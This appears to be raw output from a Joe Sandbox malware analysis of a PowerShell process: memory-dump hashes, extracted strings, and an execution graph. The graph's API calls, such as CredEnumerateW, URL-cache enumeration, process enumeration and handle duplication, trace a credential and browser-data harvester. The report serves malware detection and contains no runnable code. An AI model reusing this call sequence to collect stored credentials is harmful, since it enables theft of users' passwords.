                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e1e695777fd6d667230d0d46092c9c139e6214a54a956b9cdbcace3cb366c6e
                                                                                                      • Instruction ID: 0323059f0de0307110ec5b7e05f676e23333a0e98f5ce8cbd9e1ca2a75eabc0c
                                                                                                      • Opcode Fuzzy Hash: 5e1e695777fd6d667230d0d46092c9c139e6214a54a956b9cdbcace3cb366c6e
                                                                                                      • Instruction Fuzzy Hash: E8126267E8DAD24FE312966C6C670ED7F70FF532A571900F7C4848A0D3EA19248AC796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$tLkk
                                                                                                      • API String ID: 0-2667948957
                                                                                                      • Opcode ID: a00114ce390ece5bd0adf38df5ba142e3bbd0e65dd386444d60f779de2b7c159
                                                                                                      • Instruction ID: fcaf18066f349212659d4a780dff5a1e0750ec39403ed6b05094b6a0b301f8b7
                                                                                                      • Opcode Fuzzy Hash: a00114ce390ece5bd0adf38df5ba142e3bbd0e65dd386444d60f779de2b7c159
                                                                                                      • Instruction Fuzzy Hash: 029268B0B002159FDB54DF28C980B5AB7B2AF99304F14C0A9D909DB791DB72ED86CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$tLkk
                                                                                                      • API String ID: 0-1260518398
                                                                                                      • Opcode ID: 6d792e6119be8ccb1662d31aa90693326029c9a37ce1db1e8e84ee4e78b8aa9e
                                                                                                      • Instruction ID: 1cdf5f8c380e3bd772d7ba2667523f97d2a98a5ee05640a6ff594f4a12c9301e
                                                                                                      • Opcode Fuzzy Hash: 6d792e6119be8ccb1662d31aa90693326029c9a37ce1db1e8e84ee4e78b8aa9e
                                                                                                      • Instruction Fuzzy Hash: 227268B4A002159FDB60CF28C980B59B7B2BF99304F15C099D909DB792DB72ED86CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$x.jk$x.jk$-jk
                                                                                                      • API String ID: 0-3412666760
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$x.jk
                                                                                                      • API String ID: 0-3758851172
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk$-jk
                                                                                                      • API String ID: 0-4004959738
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$x.jk
                                                                                                      • API String ID: 0-571053648
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl
                                                                                                      • API String ID: 0-2992701587
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #ik
                                                                                                      • API String ID: 0-2131464689
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk
                                                                                                      • API String ID: 0-4167960440
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f68a894f6a1eaac9a16e8e29af63fb271ecb5aa619ff486f8b0db76a82afd6b1
                                                                                                      • Instruction ID: fd58d7819982dee18e375aa972f259f92d644d00147de3e2f32779857b29d6da
                                                                                                      • Opcode Fuzzy Hash: f68a894f6a1eaac9a16e8e29af63fb271ecb5aa619ff486f8b0db76a82afd6b1
                                                                                                      • Instruction Fuzzy Hash: 743226B1B0420ADFDB249F6DD8007AAB7E2AFD5211F14807AE915DB291DB35D841CBF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e3c09502922df0d13c87d6df15077db57cf40fb181de3b37fe613816eee3712
                                                                                                      • Instruction ID: 59e519562f00b16cd8c5688a156c3265cd6e01571e38b292c6f8bc2be8720673
                                                                                                      • Opcode Fuzzy Hash: 9e3c09502922df0d13c87d6df15077db57cf40fb181de3b37fe613816eee3712
                                                                                                      • Instruction Fuzzy Hash: 8D1288B17043068FCB198F6DD91076ABBA29FE2211F14C47AE595DB391EB35C842C7E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25f3d13a705e5ab64d86121484ff7a4f9745d2cff80163cdd745516aaeb20484
                                                                                                      • Instruction ID: 79a89f6b7c93f20c58bfe28466465f714b99c311b29b3785ad5fd165d14d0333
                                                                                                      • Opcode Fuzzy Hash: 25f3d13a705e5ab64d86121484ff7a4f9745d2cff80163cdd745516aaeb20484
                                                                                                      • Instruction Fuzzy Hash: 5EE115B170420ADFDB259F6DD8107AABBB2BFA6211F14C0AAD845CF252DB35C941C7E1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c9fa293811d59f865f38d233a42929262617df85b08fb0f6e0b2262bd882510
                                                                                                      • Instruction ID: 308e94ce795e60ce366ca8c2067fc4112ace402fb58894ae45a3c148d305f494
                                                                                                      • Opcode Fuzzy Hash: 7c9fa293811d59f865f38d233a42929262617df85b08fb0f6e0b2262bd882510
                                                                                                      • Instruction Fuzzy Hash: A641F5F0B04206CFCB209F6CD550B6977B2AFA5248F1884A5F505DB251EB3ADA40C7F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 34e7078f83a9d3bccb348a1859808b1d34bf8ef51485f22780a5dfdcdfec2513
                                                                                                      • Instruction ID: 537e9903e44816922906aef11a5c218ae25cbbdf361fb6dc3d3ec2e4f5ef001e
                                                                                                      • Opcode Fuzzy Hash: 34e7078f83a9d3bccb348a1859808b1d34bf8ef51485f22780a5dfdcdfec2513
                                                                                                      • Instruction Fuzzy Hash: AD412EF5A003028FCB199F6C8581B667BB29F91255F15C095E584DF362E735D841C7E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 50d737b1388786cdfa9d29eb5108a7528eab755968bf050dace53dd163b97757
                                                                                                      • Instruction ID: 3414d18bc448261ae64b09064c3705766bf5daced72fa707d7a1653c0dbafa7a
                                                                                                      • Opcode Fuzzy Hash: 50d737b1388786cdfa9d29eb5108a7528eab755968bf050dace53dd163b97757
                                                                                                      • Instruction Fuzzy Hash: 512138B271030A9BEB2459BE9890B37B2975FD5A55F24842AA505CB3C1DD76C841C3E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e7dbb58008220c4ca1eeede5795caae60d196b3745202da272a875faa1d8914
                                                                                                      • Instruction ID: b5169f3eb9dcd9f6112d900152dc436f1a510cc2612905bbca91ca211b6c0ed8
                                                                                                      • Opcode Fuzzy Hash: 1e7dbb58008220c4ca1eeede5795caae60d196b3745202da272a875faa1d8914
                                                                                                      • Instruction Fuzzy Hash: 5C216BB230031EDBEB249ABE884073773979BD5715F24842AD546DB3C1DEB5C94083E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 269c02174d326a22fcc4829577bf69f6b646883024bac6105bf83795c41169f3
                                                                                                      • Instruction ID: 3f8708ab827b6cd53b728e172eb754f8098679a8e636d5148474d62b5e2554af
                                                                                                      • Opcode Fuzzy Hash: 269c02174d326a22fcc4829577bf69f6b646883024bac6105bf83795c41169f3
                                                                                                      • Instruction Fuzzy Hash: 57215BF260838A5BDB2109798D507627F624FA2755F284057D944CF2D2EA7AC840C7A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:5.9%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:1.8%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:73
38337->38336 38339 445f3a 38337->38339 38735 409b98 GetFileAttributesW 38337->38735 38736 445093 23 API calls 38339->38736 38341->38138 38342->38141 38343->38138 38344->38133 38346 40c775 38345->38346 38738 40b1ab free free 38346->38738 38348 40c788 38739 40b1ab free free 38348->38739 38350 40c790 38740 40b1ab free free 38350->38740 38352 40c798 38353 40aa04 free 38352->38353 38354 40c7a0 38353->38354 38741 40c274 memset 38354->38741 38359 40a8ab 9 API calls 38360 40c7c3 38359->38360 38361 40a8ab 9 API calls 38360->38361 38362 40c7d0 38361->38362 38770 40c3c3 38362->38770 38366 40c877 38375 40bdb0 38366->38375 38367 40c86c 38796 4053fe 39 API calls 38367->38796 38370 40c813 _wcslwr 38794 40c634 49 API calls 38370->38794 38372 40c829 wcslen 38373 40c7e5 38372->38373 38373->38366 38373->38367 38793 40a706 wcslen memcpy 38373->38793 38795 40c634 49 API calls 38373->38795 38978 404363 38375->38978 38379 40bdee 38382 40b2cc 27 API calls 38379->38382 38384 40bf5d 38379->38384 38380 40bddf CredEnumerateW 38380->38379 38383 40be02 wcslen 38382->38383 38383->38384 38391 40be1e 38383->38391 38998 40440c 38384->38998 38385 40be26 wcsncmp 38385->38391 38388 40be7d memset 38389 40bea7 memcpy 38388->38389 38388->38391 38390 40bf11 wcschr 38389->38390 38389->38391 38390->38391 38391->38384 38391->38385 38391->38388 38391->38389 38391->38390 38392 40b2cc 27 API calls 38391->38392 38394 40bf43 LocalFree 38391->38394 39001 40bd5d 28 API calls 38391->39001 39002 404423 38391->39002 38393 40bef6 _wcsnicmp 38392->38393 38393->38390 38393->38391 38394->38391 38395 4135f7 39015 4135e0 38395->39015 38398 40b2cc 27 API calls 38399 41360d 38398->38399 38400 40a804 8 API calls 38399->38400 38401 413613 38400->38401 38402 41361b 38401->38402 38403 41363e 38401->38403 38405 40b273 27 API calls 38402->38405 38404 4135e0 FreeLibrary 38403->38404 38406 413643 38404->38406 38407 413625 GetProcAddress 38405->38407 38406->38168 38407->38403 38408 413648 38407->38408 38409 413658 38408->38409 38410 
4135e0 FreeLibrary 38408->38410 38409->38168 38411 413666 38410->38411 38411->38168 39018 4449b9 38412->39018 38415 444c1f 38415->38148 38416 4449b9 42 API calls 38418 444b4b 38416->38418 38417 444c15 38419 4449b9 42 API calls 38417->38419 38418->38417 39039 444972 GetVersionExW 38418->39039 38419->38415 38421 444b99 memcmp 38426 444b8c 38421->38426 38422 444c0b 39043 444a85 42 API calls 38422->39043 38426->38421 38426->38422 39040 444aa5 42 API calls 38426->39040 39041 40a7a0 GetVersionExW 38426->39041 39042 444a85 42 API calls 38426->39042 38429 40399d 38428->38429 39044 403a16 38429->39044 38431 403a09 39058 40b1ab free free 38431->39058 38433 4039a3 38433->38431 38437 4039f4 38433->38437 39055 40a02c CreateFileW 38433->39055 38434 403a12 wcsrchr 38434->38155 38437->38431 38438 4099c6 2 API calls 38437->38438 38438->38431 38440 414c2e 14 API calls 38439->38440 38441 404048 38440->38441 38442 414c2e 14 API calls 38441->38442 38443 404056 38442->38443 38444 409d1f 6 API calls 38443->38444 38445 404073 38444->38445 38446 409d1f 6 API calls 38445->38446 38447 40408e 38446->38447 38448 409d1f 6 API calls 38447->38448 38449 4040a6 38448->38449 38450 403af5 20 API calls 38449->38450 38451 4040ba 38450->38451 38452 403af5 20 API calls 38451->38452 38453 4040cb 38452->38453 39085 40414f memset 38453->39085 38455 4040e0 38456 404140 38455->38456 38458 4040ec memset 38455->38458 38460 4099c6 2 API calls 38455->38460 38461 40a8ab 9 API calls 38455->38461 39099 40b1ab free free 38456->39099 38458->38455 38459 404148 38459->38215 38460->38455 38461->38455 39112 40a6e6 WideCharToMultiByte 38462->39112 38464 4087ed 39113 4095d9 memset 38464->39113 38467 408809 memset memset memset memset memset 38468 40b2cc 27 API calls 38467->38468 38469 4088a1 38468->38469 38470 409d1f 6 API calls 38469->38470 38471 4088b1 38470->38471 38472 40b2cc 27 API calls 38471->38472 38473 4088c0 38472->38473 38474 409d1f 6 API calls 38473->38474 38475 4088d0 38474->38475 38476 40b2cc 27 API calls 
38475->38476 38477 4088df 38476->38477 38478 409d1f 6 API calls 38477->38478 38479 4088ef 38478->38479 38480 40b2cc 27 API calls 38479->38480 38481 4088fe 38480->38481 38482 409d1f 6 API calls 38481->38482 38483 40890e 38482->38483 38484 40b2cc 27 API calls 38483->38484 38485 40891d 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40892d 38486->38487 39132 409b98 GetFileAttributesW 38487->39132 38489 40893e 38490 408943 38489->38490 38491 408958 38489->38491 39133 407fdf 75 API calls 38490->39133 39134 409b98 GetFileAttributesW 38491->39134 38494 408964 38495 408969 38494->38495 38496 40897b 38494->38496 39135 4082c7 198 API calls 38495->39135 39136 409b98 GetFileAttributesW 38496->39136 38499 408987 38511 408953 38511->38215 38514 40b633 free 38513->38514 38515 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38514->38515 38516 413f00 Process32NextW 38515->38516 38517 413da5 OpenProcess 38516->38517 38518 413f17 CloseHandle 38516->38518 38519 413df3 memset 38517->38519 38522 413eb0 38517->38522 38518->38258 39412 413f27 38519->39412 38521 413ebf free 38521->38522 38522->38516 38522->38521 38523 4099f4 3 API calls 38522->38523 38523->38522 38524 413e37 GetModuleHandleW 38526 413e46 GetProcAddress 38524->38526 38527 413e1f 38524->38527 38526->38527 38527->38524 39417 413959 38527->39417 39433 413ca4 38527->39433 38529 413ea2 CloseHandle 38529->38522 38531 414c2e 14 API calls 38530->38531 38532 403eb7 38531->38532 38533 414c2e 14 API calls 38532->38533 38534 403ec5 38533->38534 38535 409d1f 6 API calls 38534->38535 38536 403ee2 38535->38536 38537 409d1f 6 API calls 38536->38537 38538 403efd 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 403f15 38539->38540 38541 403af5 20 API calls 38540->38541 38542 403f29 38541->38542 38543 403af5 20 API calls 38542->38543 38544 403f3a 38543->38544 38545 40414f 33 API calls 38544->38545 38546 403f4f 38545->38546 38547 403faf 38546->38547 38549 403f5b memset 38546->38549 38551 4099c6 2 API calls 38546->38551 
38552 40a8ab 9 API calls 38546->38552 39447 40b1ab free free 38547->39447 38549->38546 38550 403fb7 38550->38197 38551->38546 38552->38546 38554 414c2e 14 API calls 38553->38554 38555 403d26 38554->38555 38556 414c2e 14 API calls 38555->38556 38557 403d34 38556->38557 38558 409d1f 6 API calls 38557->38558 38559 403d51 38558->38559 38560 409d1f 6 API calls 38559->38560 38561 403d6c 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 403d84 38562->38563 38564 403af5 20 API calls 38563->38564 38565 403d98 38564->38565 38566 403af5 20 API calls 38565->38566 38567 403da9 38566->38567 38568 40414f 33 API calls 38567->38568 38574 403dbe 38568->38574 38569 403e1e 39448 40b1ab free free 38569->39448 38570 403dca memset 38570->38574 38572 403e26 38572->38212 38573 4099c6 2 API calls 38573->38574 38574->38569 38574->38570 38574->38573 38575 40a8ab 9 API calls 38574->38575 38575->38574 38577 414b81 9 API calls 38576->38577 38578 414c40 38577->38578 38579 414c73 memset 38578->38579 39449 409cea 38578->39449 38583 414c94 38579->38583 38582 414c64 38582->38191 38584 414cf4 wcscpy 38583->38584 39452 414bb0 wcscpy 38583->39452 38584->38582 38586 414cd2 39453 4145ac RegQueryValueExW 38586->39453 38588 414ce9 38588->38584 38590 409d62 38589->38590 38591 409d43 wcscpy 38589->38591 38590->38235 38592 409719 2 API calls 38591->38592 38593 409d51 wcscat 38592->38593 38593->38590 38595 40aebe FindClose 38594->38595 38596 40ae21 38595->38596 38597 4099c6 2 API calls 38596->38597 38598 40ae35 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 40ae49 38599->38600 38600->38275 38602 40ade0 38601->38602 38603 40ae0f 38601->38603 38602->38603 38604 40ade7 wcscmp 38602->38604 38603->38275 38604->38603 38605 40adfe wcscmp 38604->38605 38605->38603 38607 40ae18 9 API calls 38606->38607 38609 4453c4 38607->38609 38608 40ae51 9 API calls 38608->38609 38609->38608 38610 4453f3 38609->38610 38611 40add4 2 API calls 38609->38611 38614 445403 250 API calls 38609->38614 38612 40aebe FindClose 
38610->38612 38611->38609 38613 4453fe 38612->38613 38613->38275 38614->38609 38616 40ae7b FindNextFileW 38615->38616 38617 40ae5c FindFirstFileW 38615->38617 38618 40ae94 38616->38618 38619 40ae8f 38616->38619 38617->38618 38621 40aeb6 38618->38621 38622 409d1f 6 API calls 38618->38622 38620 40aebe FindClose 38619->38620 38620->38618 38621->38275 38622->38621 38623->38187 38624->38167 38625->38261 38626->38244 38627->38244 38628->38276 38630 409c89 38629->38630 38630->38301 38631->38329 38633 413d39 38632->38633 38634 413d2f FreeLibrary 38632->38634 38635 40b633 free 38633->38635 38634->38633 38636 413d42 38635->38636 38637 40b633 free 38636->38637 38638 413d4a 38637->38638 38638->38157 38639->38160 38640->38204 38641->38227 38643 44db70 38642->38643 38644 40b6fc memset 38643->38644 38645 409c70 2 API calls 38644->38645 38646 40b732 wcsrchr 38645->38646 38647 40b743 38646->38647 38648 40b746 memset 38646->38648 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 40b76f 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 40b783 38651->38652 39454 409b98 GetFileAttributesW 38652->39454 38654 40b792 38655 40b7c2 38654->38655 38657 409c70 2 API calls 38654->38657 39455 40bb98 38655->39455 38659 40b7a5 38657->38659 38662 40b2cc 27 API calls 38659->38662 38660 40b837 CloseHandle 38665 40b83e memset 38660->38665 38661 40b817 39489 409a45 GetTempPathW 38661->39489 38663 40b7b2 38662->38663 38666 409d1f 6 API calls 38663->38666 39488 40a6e6 WideCharToMultiByte 38665->39488 38666->38655 38667 40b827 38667->38665 38669 40b866 38670 444432 120 API calls 38669->38670 38671 40b879 38670->38671 38672 40b273 27 API calls 38671->38672 38673 40bad5 38671->38673 38674 40b89a 38672->38674 38675 40b04b ??3@YAXPAX 38673->38675 38676 438552 133 API calls 38674->38676 38677 40baf3 38675->38677 38678 40b8a4 38676->38678 38677->38238 38679 40bacd 38678->38679 38681 4251c4 136 API calls 38678->38681 38680 443d90 110 API calls 38679->38680 38680->38673 38704 40b8b8 38681->38704 
38682 40bac6 39501 424f26 122 API calls 38682->39501 38683 40b8bd memset 39492 425413 17 API calls 38683->39492 38686 425413 17 API calls 38686->38704 38689 40a71b MultiByteToWideChar 38689->38704 38690 40a734 MultiByteToWideChar 38690->38704 38693 40b9b5 memcmp 38693->38704 38694 4099c6 2 API calls 38694->38704 38695 404423 37 API calls 38695->38704 38698 4251c4 136 API calls 38698->38704 38699 40bb3e memset memcpy 39502 40a734 MultiByteToWideChar 38699->39502 38701 40bb88 LocalFree 38701->38704 38704->38682 38704->38683 38704->38686 38704->38689 38704->38690 38704->38693 38704->38694 38704->38695 38704->38698 38704->38699 38705 40ba5f memcmp 38704->38705 39493 4253ef 16 API calls 38704->39493 39494 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38704->39494 39495 4253af 17 API calls 38704->39495 39496 4253cf 17 API calls 38704->39496 39497 447280 memset 38704->39497 39498 447960 memset memcpy memcpy memcpy 38704->39498 39499 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38704->39499 39500 447920 memcpy memcpy memcpy 38704->39500 38705->38704 38706->38240 38708 40aed1 38707->38708 38709 40aec7 FindClose 38707->38709 38708->38291 38709->38708 38711 4099d7 38710->38711 38712 4099da memcpy 38710->38712 38711->38712 38712->38214 38714 40b2cc 27 API calls 38713->38714 38715 44543f 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 44544f 38716->38717 39594 409b98 GetFileAttributesW 38717->39594 38719 44545e 38720 445476 38719->38720 38722 40b6ef 249 API calls 38719->38722 38721 40b2cc 27 API calls 38720->38721 38723 445482 38721->38723 38722->38720 38724 409d1f 6 API calls 38723->38724 38725 445492 38724->38725 39595 409b98 GetFileAttributesW 38725->39595 38727 4454a1 38728 4454b9 38727->38728 38729 40b6ef 249 API calls 38727->38729 38728->38242 38729->38728 38730->38241 38731->38266 38732->38272 38733->38307 38734->38288 38735->38337 38736->38337 38737->38318 38738->38348 38739->38350 38740->38352 38742 414c2e 14 API calls 38741->38742 38743 40c2ae 38742->38743 38797 
40c1d3 38743->38797 38748 40c3be 38765 40a8ab 38748->38765 38749 40afcf 2 API calls 38750 40c2fd FindFirstUrlCacheEntryW 38749->38750 38751 40c3b6 38750->38751 38752 40c31e wcschr 38750->38752 38753 40b04b ??3@YAXPAX 38751->38753 38754 40c331 38752->38754 38755 40c35e FindNextUrlCacheEntryW 38752->38755 38753->38748 38757 40a8ab 9 API calls 38754->38757 38755->38752 38756 40c373 GetLastError 38755->38756 38758 40c3ad FindCloseUrlCache 38756->38758 38759 40c37e 38756->38759 38760 40c33e wcschr 38757->38760 38758->38751 38761 40afcf 2 API calls 38759->38761 38760->38755 38762 40c34f 38760->38762 38763 40c391 FindNextUrlCacheEntryW 38761->38763 38764 40a8ab 9 API calls 38762->38764 38763->38752 38763->38758 38764->38755 38913 40a97a 38765->38913 38768 40a8cc 38768->38359 38769 40a8d0 7 API calls 38769->38768 38918 40b1ab free free 38770->38918 38772 40c3dd 38773 40b2cc 27 API calls 38772->38773 38774 40c3e7 38773->38774 38775 40c50e 38774->38775 38776 40c3ff 38774->38776 38790 405337 38775->38790 38777 40a9ce 4 API calls 38776->38777 38778 40c418 memset 38777->38778 38919 40aa1d 38778->38919 38781 40c471 38783 40c47a _wcsupr 38781->38783 38782 40c505 38782->38775 38784 40a8d0 7 API calls 38783->38784 38785 40c498 38784->38785 38786 40a8d0 7 API calls 38785->38786 38787 40c4ac memset 38786->38787 38788 40aa1d 38787->38788 38789 40c4e4 RegEnumValueW 38788->38789 38789->38782 38789->38783 38921 405220 38790->38921 38793->38370 38794->38372 38795->38373 38796->38366 38798 40ae18 9 API calls 38797->38798 38804 40c210 38798->38804 38799 40ae51 9 API calls 38799->38804 38800 40c264 38801 40aebe FindClose 38800->38801 38803 40c26f 38801->38803 38802 40add4 2 API calls 38802->38804 38809 40e5ed memset memset 38803->38809 38804->38799 38804->38800 38804->38802 38805 40c231 _wcsicmp 38804->38805 38806 40c1d3 34 API calls 38804->38806 38805->38804 38807 40c248 38805->38807 38806->38804 38822 40c084 21 API calls 38807->38822 38810 414c2e 14 API calls 38809->38810 38811 40e63f 
38810->38811 38812 409d1f 6 API calls 38811->38812 38813 40e658 38812->38813 38823 409b98 GetFileAttributesW 38813->38823 38815 40e667 38816 409d1f 6 API calls 38815->38816 38818 40e680 38815->38818 38816->38818 38824 409b98 GetFileAttributesW 38818->38824 38819 40e68f 38820 40c2d8 38819->38820 38825 40e4b2 38819->38825 38820->38748 38820->38749 38822->38804 38823->38815 38824->38819 38846 40e01e 38825->38846 38827 40e593 38828 40e5b0 38827->38828 38829 40e59c DeleteFileW 38827->38829 38830 40b04b ??3@YAXPAX 38828->38830 38829->38828 38832 40e5bb 38830->38832 38831 40e521 38831->38827 38869 40e175 38831->38869 38834 40e5c4 CloseHandle 38832->38834 38835 40e5cc 38832->38835 38834->38835 38837 40b633 free 38835->38837 38836 40e573 38839 40e584 38836->38839 38840 40e57c CloseHandle 38836->38840 38838 40e5db 38837->38838 38842 40b633 free 38838->38842 38912 40b1ab free free 38839->38912 38840->38839 38841 40e540 38841->38836 38889 40e2ab 38841->38889 38844 40e5e3 38842->38844 38844->38820 38847 406214 22 API calls 38846->38847 38848 40e03c 38847->38848 38849 40e16b 38848->38849 38850 40dd85 74 API calls 38848->38850 38849->38831 38851 40e06b 38850->38851 38851->38849 38852 40afcf ??2@YAPAXI ??3@YAXPAX 38851->38852 38853 40e08d OpenProcess 38852->38853 38854 40e0a4 GetCurrentProcess DuplicateHandle 38853->38854 38858 40e152 38853->38858 38855 40e0d0 GetFileSize 38854->38855 38856 40e14a CloseHandle 38854->38856 38859 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38855->38859 38856->38858 38857 40e160 38861 40b04b ??3@YAXPAX 38857->38861 38858->38857 38860 406214 22 API calls 38858->38860 38862 40e0ea 38859->38862 38860->38857 38861->38849 38863 4096dc CreateFileW 38862->38863 38864 40e0f1 CreateFileMappingW 38863->38864 38865 40e140 CloseHandle CloseHandle 38864->38865 38866 40e10b MapViewOfFile 38864->38866 38865->38856 38867 40e13b CloseHandle 38866->38867 38868 40e11f WriteFile UnmapViewOfFile 